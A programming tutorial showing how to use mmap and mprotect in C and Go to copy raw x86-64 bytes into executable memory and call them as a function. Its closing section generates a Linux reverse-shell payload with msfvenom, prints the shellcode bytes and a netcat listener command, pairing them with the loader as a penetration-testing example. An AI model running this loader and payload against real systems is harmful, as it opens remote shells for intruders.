Playing with MMap

Intro to mmap

mmap is a really awesome POSIX system call, available on Linux, for creating memory maps: regions of virtual memory inside the address space of the calling process. In its anonymous form it’s similar to VirtualAlloc on Windows and serves a similar purpose. It also gives you a way to “map” files or devices into the current address space, thereby treating a file or device as if it were inside RAM. This avoids the explicit read() calls and the extra copy into a user-space buffer that normal I/O operations incur; the kernel pages the data in on demand as you touch the memory.

With a memory mapped file, file reading could be done as easily as shifting a pointer through memory and looking at the content; no need for explicit read() and write() calls. It’s also possible to create executable areas of memory, and then jump into the memory and run it as a part of the program. What’s super fascinating about this is that you can create programs that write other programs to memory and run them in-process. For example, you could write a compiler for your own language, and instead of compiling out an executable, just write the compiled bytes to a memory mapped file, and execute it in memory. This is the concept behind Just-In-Time (JIT) compilation.
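To make the "shifting a pointer through memory" idea concrete, here is a minimal sketch that counts how often a byte occurs in a file by mapping it read-only and walking the mapping. The function name count_byte_mmap is made up for this illustration, and error handling is kept deliberately thin.

```c
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: count occurrences of `needle` in the file at `path`
 * by mapping it read-only and scanning the bytes. Returns -1 on error. */
long count_byte_mmap(const char *path, char needle) {
  assert(path != NULL);

  int fd = open(path, O_RDONLY);
  if (fd < 0) {
    perror("open");
    return -1;
  }

  struct stat st;
  if (fstat(fd, &st) != 0) {
    perror("fstat");
    close(fd);
    return -1;
  }
  size_t len = (size_t)st.st_size;
  if (len == 0) { /* mmap rejects a zero-length mapping */
    close(fd);
    return 0;
  }

  const char *data = mmap(NULL, len, PROT_READ, MAP_PRIVATE, fd, 0);
  close(fd); /* the mapping stays valid after the descriptor is closed */
  if (data == MAP_FAILED) {
    perror("mmap");
    return -1;
  }

  /* No read() calls: the file contents are just bytes behind a pointer. */
  long count = 0;
  for (const char *p = data; p < data + len; p++) {
    if (*p == needle) count++;
  }

  munmap((void *)data, len);
  return count;
}
```

Calling count_byte_mmap("some_file.txt", '\n') would give the number of newline bytes in that file, with the kernel paging the contents in as the loop touches them.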

Using mmap from C

C is an incredibly powerful language and it allows you to cast data pointers to function pointers without complaint. Types are C’s way to pretend it has friendly developer ergonomics, meanwhile flexing its nonchalant attitude that bytes are just bytes and mean whatever the fuck you want them to mean.

There is not a lot to the mmap API and we’re going to be calling it like this:

void *mem =
      mmap(NULL, size, PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANON, -1, 0);

What we’re asking for here, according to the doco https://man7.org/linux/man-pages/man2/mmap.2.html is for the Linux kernel to find whatever spot it can of size size and mark it writeable, readable, private and anonymous…

By passing NULL as the address, we let the kernel decide where to create the map. Otherwise, we’d have to be aware of our own address space and know which address to request for the map. In our case, I don’t care and the kernel knows best.
size is the size in bytes, and I’ll show you where that comes from shortly.
PROT_WRITE and PROT_READ are just protection flags and this is what I pass as default since I know I want to both write and read from the map.
MAP_PRIVATE and MAP_ANON are because it should be invisible to other processes (opposite of MAP_SHARED for example), and I want it to be anonymous, meaning it’s not actually backed by anything on disk.
Since we passed the MAP_ANON flag, we then pass -1 as the file descriptor since there is no backing file.
We pass 0 for the offset, since there is no offset and no backing file to offset into anyway.

Once we have a pointer to our mapped region, we just call memcpy to get our data into it. However, even if we cast it to a function now, we can’t actually call it. Calling it would require the instruction pointer landing in that memory to start executing, and the kernel will not allow this unless the area is marked as executable. So we need another syscall called mprotect, which is just short for memory protect. It changes the protection of an existing mapping, using the same PROT_* flags that mmap takes. mprotect has doco at https://man7.org/linux/man-pages/man2/mprotect.2.html

int res = mprotect(mem, size, PROT_EXEC | PROT_READ);

This time we are asking for the same memory to be re-protected as executable and readable. Most systems will require executable memory to also be readable and that makes sense. res will hold the return code which should be 0 if everything went well. So now that we have a way of creating an executable bit of memory, we need to be able to actually execute it. In C, this is straightforward. We create a type of function, then cast the pointer we have to be an instance of that function, then call it:

// Firstly, create the definition, called Func, because naming is hard
typedef int (*Func)();
// Cast the pointer to our Func
Func func = (Func)mem;
// Then call it
func();

Now, the reason I created Func as a function that returns an int is because of the code I was trying to run in memory. Using FASM, I created the bytes I care about (code.asm):

use64
format binary 

mov rax, 69
ret

And then assembled it with fasm code.asm. cat code.bin | xxd -p gives the raw bytes to populate in the calling C code. This FASM code simply puts 69 in the rax register, which the x86-64 System V calling convention uses for integer return values, and then executes ret, which pops the return address off the stack and jumps back to the C code that called us, much like C’s return. Since the assembly returns an integer, the C function type we are casting to must have an integer return type.
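
To show how those bytes break down, here is a small sketch that builds the same instruction sequence by hand for any 32-bit constant. The function emit_return_const and the RETURN_CONST_LEN constant are invented for this illustration; it only writes bytes into a buffer and does not execute anything.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum { RETURN_CONST_LEN = 8 }; /* 7 bytes of mov + 1 byte of ret */

/* Hypothetical helper: write the x86-64 encoding of `mov rax, value; ret`
 * into buf. Returns the number of bytes written, or 0 if buf is too small. */
size_t emit_return_const(uint8_t *buf, size_t cap, int32_t value) {
  assert(buf != NULL);
  if (cap < RETURN_CONST_LEN) return 0;

  uint32_t imm = (uint32_t)value;
  buf[0] = 0x48;                          /* REX.W prefix: 64-bit operand */
  buf[1] = 0xc7;                          /* opcode: MOV r/m64, imm32 */
  buf[2] = 0xc0;                          /* ModRM: register direct, rax */
  buf[3] = (uint8_t)(imm & 0xff);         /* immediate, little-endian */
  buf[4] = (uint8_t)((imm >> 8) & 0xff);
  buf[5] = (uint8_t)((imm >> 16) & 0xff);
  buf[6] = (uint8_t)((imm >> 24) & 0xff);
  buf[7] = 0xc3;                          /* RET */
  return RETURN_CONST_LEN;
}
```

With a value of 69 this produces the same eight bytes that xxd printed for code.bin, which is a nice sanity check that the assembler is not doing anything magical.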

The full working code in C is:

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

typedef int (*Func)();

int main() {
  uint8_t code[] = {0x48, 0xc7, 0xc0, 0x45, 0x00, 0x00, 0x00, 0xc3};
  size_t size = sizeof(code) / sizeof(code[0]);

  void *mem =
      mmap(NULL, size, PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANON, -1, 0);

  if (MAP_FAILED == mem) { // mmap reports failure with MAP_FAILED, not NULL
    printf("Failed to map memory\n");
    return 1;
  }

  memcpy(mem, code, size);

  int res = mprotect(mem, size, PROT_EXEC | PROT_READ);
  if (res != 0) {
    printf("Failed to make memory executable!\n");
    return 2;
  }

  Func func = (Func)mem;

  return func();
}

And it is compilable and runnable as this:

gcc -o test -lc test.c && ./test; echo $?
69

This gives us the expected return code of 69. Pretty straightforward.

If you’re like me, then this seems pretty cool, but you may not want to do this in C even though this specifically is easy. The rest of C often offers more pain than value. Let’s do it in Golang instead!

Using mmap from Golang

Golang makes this process a bit harder. You can definitely use mmap and mprotect easily enough, since the golang.org/x/sys/unix package exists and its functions map almost 1:1 to the actual syscalls. They’re the easy part:

// mmap call
mem, err := unix.Mmap(-1, 0, len(code), unix.PROT_WRITE|unix.PROT_READ, unix.MAP_PRIVATE|unix.MAP_ANON)
// mprotect call
err = unix.Mprotect(mem, unix.PROT_READ|unix.PROT_EXEC)

The order of arguments has changed slightly for mmap: the file descriptor and offset come first, and the address argument is gone. mprotect no longer needs the size, just the slice, since a slice already carries its own length.

However, Golang does not use the same calling convention as C. See https://go.dev/src/cmd/compile/abi-internal and notice the complicated rules for how calling works in Golang. It actually makes a lot of sense and there is nothing bad at all in the way Golang does this; it’s perfect for Golang, but it means there is some difficulty with simply calling raw bytes as a function. Our snippet happens to be compatible: it takes no arguments, touches nothing but rax, and on amd64 with Go 1.17 or later the register-based ABI returns the first integer result in RAX. We now have a multi-step process to go from bytes to function in Golang.

Firstly, when you call mmap in Golang, the result, even though it’s a []byte, is not just an area of memory that is an array of bytes like in C. It’s a Golang slice. This is a Golang construct that manages its own length and capacity, since it is effectively a dynamic array. So the []byte you get back is a slice header, and not a bare pointer to an area of memory. However, the actual pointer is in there, and we can get at it by reinterpreting an unsafe pointer to the slice as a struct of the same shape as the real Golang slice header, then using its data pointer to build a function. So we build these two structures first to be our representation of Golang’s internal function values and slices:

type fn struct {
	ptr uintptr
}

type slice struct {
	Data uintptr
	Len  int
	Cap  int
}

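So when we have a Golang slice, we now have to effectively unmarshal it as our slice representation, extract the pointer to its data and use it to construct our representation of a function, fn, then cast that to a higher level Golang func. The extra level of indirection is there because a Golang func value is a pointer to a structure whose first word is the code address: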

s := (*slice)(unsafe.Pointer(&mem))
f := &fn{ptr: s.Data}
execFn := *(*func() int)(unsafe.Pointer(&f))

I think this is truly fascinating because you have to understand how Golang is actually representing slices and functions otherwise the conversion would be impossible. We can now run the function we’ve created by calling execFn(). For this demo, I’m using the same FASM generated assembly as before:

package main

import (
	"fmt"
	"os"
	"unsafe"

	"golang.org/x/sys/unix"
)

type fn struct {
	ptr uintptr
}

type slice struct {
	Data uintptr
	Len  int
	Cap  int
}

func main() {
	code := []byte{0x48, 0xc7, 0xc0, 0x45, 0x00, 0x00, 0x00, 0xc3}
	mem, err := unix.Mmap(-1, 0, len(code), unix.PROT_WRITE|unix.PROT_READ, unix.MAP_PRIVATE|unix.MAP_ANON)
	if err != nil {
		fmt.Println(err)
		os.Exit(1)
	}

	n := copy(mem, code)
	if n != len(code) {
		fmt.Println("Failed to copy entire code into mmap")
		os.Exit(2)
	}

	if err := unix.Mprotect(mem, unix.PROT_READ|unix.PROT_EXEC); err != nil {
		fmt.Println(err)
		os.Exit(3)
	}

	s := (*slice)(unsafe.Pointer(&mem))
	f := &fn{ptr: s.Data}
	execFn := *(*func() int)(unsafe.Pointer(&f))

	os.Exit(execFn())
}

You will need to go get "golang.org/x/sys/unix" to make sure you have the required unix package first, otherwise, Mmap and Mprotect won’t be available to you. Finally, run the code:

go run main.go
exit status 69

We have got our exit code as expected.

Next steps

This can be extended to other uses, for example in penetration testing. It’s trivial to generate a reverse shell with msfvenom, grab the raw bytes, and drop them in as the code for a more interesting example.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -b "\x00" --encoder none 2>/dev/null | xxd -p -c 0 | sed 's/../0x&,/g; s/,$//'

This will give a payload of:

0x6a,0x29,0x58,0x99,0x6a,0x02,0x5f,0x6a,0x01,0x5e,0x0f,0x05,0x48,0x97,0x48,0xb9,0x02,0x00,0x11,0x5c,0x7f,0x00,0x00,0x01,0x51,0x48,0x89,0xe6,0x6a,0x10,0x5a,0x6a,0x2a,0x58,0x0f,0x05,0x6a,0x03,0x5e,0x48,0xff,0xce,0x6a,0x21,0x58,0x0f,0x05,0x75,0xf6,0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x52,0x57,0x48,0x89,0xe6,0x0f,0x05

We can catch the reverse shell using nc -lnvp 4444 in one terminal, and run go run main.go in another.